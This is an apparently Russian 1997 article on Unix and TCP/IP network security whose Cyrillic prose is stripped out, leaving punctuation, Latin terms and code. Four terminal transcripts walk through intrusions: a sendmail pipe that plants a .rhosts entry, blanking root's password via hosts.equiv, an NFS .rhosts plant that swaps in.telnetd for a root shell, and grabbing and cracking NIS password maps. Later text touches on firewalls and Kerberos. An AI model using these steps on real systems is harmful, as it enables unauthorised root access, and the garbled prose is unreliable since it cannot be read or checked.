. ,
" ", lsu@kiae.su ---------------------------------------------------------------TCP/IP Internet. , . , , . Internet . , , . CERT.
, , Internet, . "", . , Unix, .
. IP sendmail, . , Unix-. , . passwd , rlogin, rsh shell ( 1).
|
1 |
crack% telnet target.remote.com 25 Connecting to 123.456.654.321. ! 25 - SMTP 220 sendmail SMI/4.3.5.2 ready ! , , . helo xxx 220 Helo xxx, ( crack.edu ) mail from: "|echo crack.edu>/.rhosts"@target.remote.com ! . 200 Sender ok. rcpt to: nosuchuser ! 500 nosuchuser: user unknown ! , . data 230 Enter mail, end with "." 200 Mail accepted ! , .... quit crack% su ! , who # rsh target.remote.com /bin/csh -i Welcome to remote.com! Warning! No access to terminal, job control disabled! target# |
Unix . , : Sun, SunOS 4, NIS , , ( 2).
|
2 |
crack# su - bin $ rsh target.remote.com /bin/csh -i ! /etc/hosts.equiv "+" ... Welcome to remote.com! ! /etc bin... Warning! No access to terminal, job control disabled! % ls -ldg /etc drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/ % cd /etc ! passwd ... % mv passwd passwd.was % cp passwd.was passwd ! % ed passwd 2341 1p root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh s/Nkkh&5gkljGyj//p root::0:0:Root:/:/bin/csh w 2341 q ! . %echo /bin/csh -i | su root Warning! No access to terminal, job control disabled! target# mv /etc/passwd.was /etc/passwd ! , . |
TCP/IP , Network File System (NFS).
/etc/exports (SunOS 4.1) ( 3).
|
3 |
crack% showmount -e target.remote.com Export list for target.remote.com /home Everyone /disk3 neptun pluton alpha ! NFS crack% su # mount -t nfs target.remote.com:/home /mnt # cd /mnt ! # ls -ldg * drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/ # echo crack.edu > user/.rhosts ! .rhosts # cat >> /etc/passwd user::257:20::/: ^D ! # su - user ! $ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! , ! root" % cd /usr/etc % mv in.telnetd in.telnetd1 ! % cat > in.telnetd #!/bin/sh exec /bin/csh -i ^D % chmod 755 in.telnetd ! % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! # chown user /etc; ! /etc ^M: command not found # exit; ^M: command not found Connection closed by foreign host. % cd /etc ! 1. ....... |
NIS- , "" passwd, . , , crack . ( 4) ( , ).
|
4 |
! NIS crack% rpcinfo -p target.remote.com | grep bind 120000 2 udp 2493 ypbind ! ... crack% ypx -o target.passwd -g target.remote.com ! crack% crack target.passwd ! [ a lot of time ] OK, user "user" has password "iamuser" ! , crack% telnet target.remote.com ! . ..... |
, , . , . (cisco, wellfleet...) Unix- (Sun, DEC, BSDI, FreeBSD). . , / . rlogin, rsh, RPC (. ), , 2048 2049, - NFS. , , 25 . , - , TCP- . ( . firewall - ). " " (software firewall). , IP-, . , , (telnet, ftp...), , , . . , , ftp arch.kiae.su, :
% ftp arch.kiae.su
Connected to arch.kiae.su
Name: (arch.kiae.su: you)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our.workstation.our.company.com
.....
:
% ftp our-soft-firewall
Name: (our-soft-firewall:user) ftp@arch.kiae.su
Password: XXXXXXX
Connected to arch.kiae.su
Name: (arch.kiae.su: ftp)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our-sort-firewall.our.company.com
.......
telnet, rlogin, X11 ..
"" . , "" . ? , - , , Ethernet. , , . , , , NFS. , , , . , .
80- Kerberos. . , "" , . , , . . , , , - . , , . , , , , , . . . , . . -, . , , , telnet , , , . , Kerberos 4 . , Kerberos, , , . Kerberos 4 , , Kerberos ( , ..). , , 5, . Sphinx DEC NIS+ Sun. , (RPC UDP) .
, , , . "" . - , . He " ", - "" , .
Last-modified: Mon, 05 May 1997 07:36:09 GMT